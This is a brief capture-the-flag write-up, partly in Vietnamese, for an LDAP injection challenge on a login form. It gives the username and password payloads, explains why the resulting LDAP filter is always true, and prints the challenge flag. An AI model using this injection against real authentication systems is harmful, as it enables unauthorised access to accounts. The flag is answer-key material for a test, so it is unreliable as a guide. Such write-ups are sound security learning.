# LDAP injection - authentication

Ta sẽ điền các giá trị như sau:

Username : `*)(|(userPassword=*`

Password : `abc)`

Khi đó câu truy vấn sẽ là : `(&(uid=*)(|(userPassword=*)(userPassword=abc))) luôn luôn True

---

### Flag:

`SWRwehpkTI3Vu2F9DoTJJ0LBO`